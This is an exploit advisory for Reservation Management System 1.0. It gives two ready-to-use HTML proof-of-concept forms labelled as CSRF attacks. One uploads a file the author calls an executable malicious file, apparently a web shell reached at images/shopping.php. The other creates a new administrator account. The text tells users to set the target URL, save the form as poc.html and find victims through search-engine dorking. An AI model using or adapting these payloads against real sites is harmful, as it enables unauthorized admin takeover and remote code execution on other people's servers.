| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================
poc :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Line 8 : Set your target url
[+] save payload as poc.html
[+] payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New Menu</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Menu Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Category</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="cat" required="">
<option value="9">Dessert</option>
<option value="6">Main Course</option>
<option value="7">Pasta</option>
<option value="10">Rice</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Subcategory</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="subcat">
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Description</label>
<div class="col-lg-8">
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Price</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Image</label>
<div class="col-lg-8">
<input type="file" class="form-control" name="image" id="title">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php
-----------[+] Part 02 Add Admin [+]-------------------
[+] Line 8 : Set your target url
[+] save payload as poc.html
[+] payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New User</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Full Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="username">Username</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="password">Password</label>
<div class="col-lg-8">
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================